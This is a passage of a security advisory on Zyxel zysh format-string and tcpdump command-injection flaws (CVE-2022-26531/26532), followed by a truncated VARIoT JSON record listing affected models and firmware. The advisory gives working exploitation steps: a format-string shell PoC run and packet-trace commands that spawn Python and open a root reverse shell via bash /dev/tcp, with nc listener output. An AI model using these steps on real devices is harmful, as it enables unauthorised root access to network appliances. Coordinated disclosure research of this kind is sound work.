    • Interact with the spawned bash shell!

    We initially thought that Python/Paramiko would be a good language choice for the implementation, but we quickly changed our mind. In the end, we decided to go full old-school and developed our exploit in Tcl/Expect. Here it is in action:

    raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp admin password raptor_zysh_fhtagn.exp - zysh format string PoC exploit Copyright (c) 2022 Marco Ivaldi raptor@0xdeadbeef.info

    Leaked stack address: 0x7fe97170 Shellcode address: 0x7fe9de40 Base string length: 46 Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn

    *** enjoy your shell! ***

    sh-5.1$ uname -snrmp Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0 sh-5.1$ id uid=10007(admin) gid=10000(operator) groups=10000(operator)

    Once we have access to a bash shell on the underlying embedded Linux OS, it should be pretty easy to escalate privileges to root, by leveraging local vulnerabilities [1].

    It should not be too hard to automate/weaponize our exploit to make it work against other targets. This is left as an exercise.

    In conclusion, format string bugs are a powerful exploit primitive, one of our favorites. Once again, they proved to be up to the task even in a constrained scenario such as the one we described.

    --[ 5.3 - OS command injection

    We managed to find a way to execute arbitrary OS commands by injecting specially-crafted arguments into the tcpdump command line. However, exploitation of this vulnerability to escape the restricted shell environment is not straightforward, due to a number of constraints:

    • We can only execute OS commands that do something useful to reach our goal when invoked with exactly one command-line argument.

    • Executing "bash -i" (or similar commands such as gdb and python) directly does not work, because the shell would die with a "Bad file descriptor" error or similar.

    • We could upload a shellcode binary via the FTP service (enabled by default on our test device) in the /etc/zyxel/ftp/tmp directory, but to be able to execute it we would need to find a way to turn the file's executable bit on; we might also be able to abuse some zysh functionality to create an executable file in /etc/zyxel/ftp/tmp that we can later overwrite via FTP or some other means that keep the executable bit on, but we could not find an immediate way to do this.

    • We even crafted plain-text traffic to inject arbitrary commands into the pcap output file saved by tcpdump, and tried executing this file as a bash script, but bash would refuse to run it ("cannot execute binary file").

    • Alternatively, we could directly upload a shell script via FTP and run it as an argument to bash, but before its execution it would get overwritten by tcpdump; in theory, we could try winning a race by continuously uploading the shell script while tcpdump is executing. Luckily, before we had to implement this, we found a better way.

    We were indeed lucky in finding almost by accident the reliable way to exploit this vulnerability that we are going to describe, which involves the use of standard output as a tcpdump output file ("-w -" command-line option) and some eldritch file descriptor trickery.

    In order to escape the restricted shell environment and execute arbitrary commands as root on the underlying embedded Linux OS, first authenticate to the Web Console at https:///webconsole/ as either an admin or limited-admin user. Then, run the following commands:

    Router# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z python tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes ... Maximum file limit reached: 1 5 packets captured 10 packets received by filter 0 packets dropped by kernel Router# Python 2.7.14 (default, Sep 23 2021, 23:30:37) [GCC 4.7.0] on linux2 Type "help", "copyright", "credits" or "license" for more information.

    [press enter a few times] Router# Router# Router# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z bash tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes ... Maximum file limit reached: 1 5 packets captured 10 packets received by filter 0 packets dropped by kernel Router# # [press enter again] File "", line 1 ^ SyntaxError: invalid syntax import os os.system("bash -i >& /dev/tcp//23234 0>&1")

    This will get you a privileged reverse shell:

    raptor@gollum:~$ nc -nvlp 23234 Listening on 0.0.0.0 23234 Connection received on 54330 bash: cannot set terminal process group (25792): Inappropriate ioctl for device bash: no job control in this shell bash-5.1# uname -a uname -a Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon #2 Fri Sep 24 00:34:21 CST 2021 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7010p1.2-800-AAP) GNU/Linux bash-5.1# id id uid=0(root) gid=10000(operator) groups=0(root),10000(operator) bash-5.1#

    Of course, you can choose to execute your favorite Python code instead.

    Apparently, we managed to find a way to connect the standard input of the Web Console to the standard input of the python process we spawned with the first command, in a mind-bending exploit. To preserve our sanity, we have not thoroughly investigated how this is happening... but it works! And it is very reliable.

    On our test device, this exploitation vector only works from the Web Console, as an authenticated admin or limited-admin user. As an added benefit, as we have seen, the Web Console spawns zysh as root.

    We do not exclude other ways to exploit the described vulnerability, perhaps by creating or overwriting critical system files. It could also be easily abused to clobber arbitrary files and cause a Denial of Service condition on vulnerable devices, although we are not going to provide a proof-of-concept exploit for this (we are pretty sure you can easily figure it out on your own anyway).

    --[ 6 - Affected products

    According to Zyxel, zysh is present on a wide range of products, including their security appliances such as FLEX, ATP, USG, VPN, and ZyWALL [9], AP controllers and APs.

    Our audit was conducted exclusively on a Zyxel USG20-VPN test device with Firmware 5.10. However, other products and firmware versions have been confirmed by Zyxel to be affected by the same vulnerabilities.

    --[ 7 - Remediation

    During the whole coordinated disclosure process, Zyxel was very responsive. Working with them has been a pleasure and we would like to publicly acknowledge it, as unfortunately this is not always the case with every vendor.

    The memory corruption bugs were collectively assigned CVE-2022-26531, while the OS command injection vulnerability was assigned CVE-2022-26532. Please refer to their advisory for patching information.

    We have not checked the effectiveness of the fixes.

    --[ 8 - Disclosure timeline

    2022-02-25: Zyxel was notified via security@zyxel.com.tw. 2022-02-25: Zyxel acknowledged our vulnerability reports. 2022-03-17: Zyxel assigned CVE-2022-26531 and CVE-2022-26532 to the reported issues and informed us of their intention to publish their security advisory on 2022-05-24. 2022-03-18: As a token of their appreciation, Zyxel gave us a certificate of recognition. 2022-05-24: Zyxel published their security advisory, following our coordinated disclosure timeline. 2022-06-07: HN Security published this advisory with full details.

    --[ 9 - References

    [0] https://www.zyxel.com/ [1] https://security.humanativaspa.it/tag/zyxel/ [2] https://www.dropbox.com/s/kvm5xwxqfrwge0t/USG20-VPN_5.10.zip?dl=1 [3] https://en.wikipedia.org/wiki/MIPS_architecture [4] https://gtfobins.github.io/gtfobins/tcpdump/ [5] https://www.tcpdump.org/manpages/tcpdump.1.html [6] https://twitter.com/pulsoid/status/1368146791473045504 [7] http://phrack.org/issues/70/13.html#article [8] https://github.com/0xdea/exploits/blob/master/zyxel/raptor_zysh_fhtagn.exp [9] https://support.zyxel.eu/hc/en-us/articles/360013941859

    Copyright (c) 2022 Marco Ivaldi and Humanativa Group. All rights reserved

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202205-1790",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg2200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "vpn100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "nwa90ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.27\\(accv.2\\)"
          },
          {
            "model": "wac6553d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(aasg.7\\)"
          },
          {
            "model": "nwa5123-ac-hd",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abim.6\\)"
          },
          {
            "model": "usg20",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "wac6303d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abgl.6\\)"
          },
          {
            "model": "wac6502d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(aase.7\\)"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "wac5302d-sv2",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abvz.6\\)"
          },
          {
            "model": "wac500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abvs.2\\)"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg210",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "vpn1000",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "wac6103d-i",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(aaxh.7\\)"
          },
          {
            "model": "usg 60",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nsg300",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "nsg50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "usg 110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "wax630s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abzd.2\\)"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg 40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg 1900",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg210",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "wax650s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abrm.2\\)"
          },
          {
            "model": "nwa210ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abtd.2\\)"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "nap353",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abey.7\\)"
          },
          {
            "model": "nsg100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "nsg300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.00"
          },
          {
            "model": "usg 60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "wax610d",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abte.2\\)"
          },
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "nsg50",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "nxc5500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.10\\(aaos.3\\)"
          },
          {
            "model": "wac6552d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abio.7\\)"
          },
          {
            "model": "usg 60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "wac6503d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(aasf.7\\)"
          },
          {
            "model": "nsg50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.00"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "nap303",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abex.7\\)"
          },
          {
            "model": "wac5302d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.10\\(abfh.10\\)"
          },
          {
            "model": "usg 1100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "nxc2500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.10\\(aaig.3\\)"
          },
          {
            "model": "nsg100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "nwa1302-ac",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abku.6\\)"
          },
          {
            "model": "vpn50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg 20w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 40w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "wac6502d-e",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(aasd.7\\)"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg2200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nwa1123acv3",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abvt.2\\)"
          },
          {
            "model": "nwa1123-ac-hd",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abin.6\\)"
          },
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nwa50ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abyw.5\\)"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "nap203",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abfa.7\\)"
          },
          {
            "model": "usg 40",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "wac500h",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abwa.2\\)"
          },
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 60w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "usg 110",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nwa55axe",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abzl.5\\)"
          },
          {
            "model": "usg 1100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 20w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 1900",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "nsg100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.00"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg20",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "vpn300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "nwa110ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abtg.2\\)"
          },
          {
            "model": "nwa1123-ac-pro",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abhd.7\\)"
          },
          {
            "model": "wax510d",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.30\\(abtf.2\\)"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "nsg300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "usg 310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-26531"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_110_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_110:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_1100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_1100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_1900_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
